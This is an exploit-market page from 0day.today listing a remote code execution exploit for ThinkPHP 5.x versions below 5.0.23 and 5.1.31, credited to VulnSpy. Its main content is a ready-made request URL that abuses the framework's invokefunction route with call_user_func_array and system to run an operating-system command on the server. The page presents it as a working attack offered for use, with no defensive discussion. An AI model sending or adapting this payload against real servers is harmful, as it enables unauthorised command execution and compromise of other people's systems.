[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ThinkPHP 5.0.23/5.1.31 - Remote Code Execution Vulnerability

Author
VulnSpy
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-31773
Category
web applications
Date add
12-12-2018
Platform
php
# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
# Exploit Author: VulnSpy
# Vendor Homepage: https://thinkphp.cn
# Software Link: https://github.com/top-think/framework/
# Version: v5.x below v5.0.23,v5.1.31
# CVE: N/A

# Exploit

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

#  0day.today [2024-09-28]  #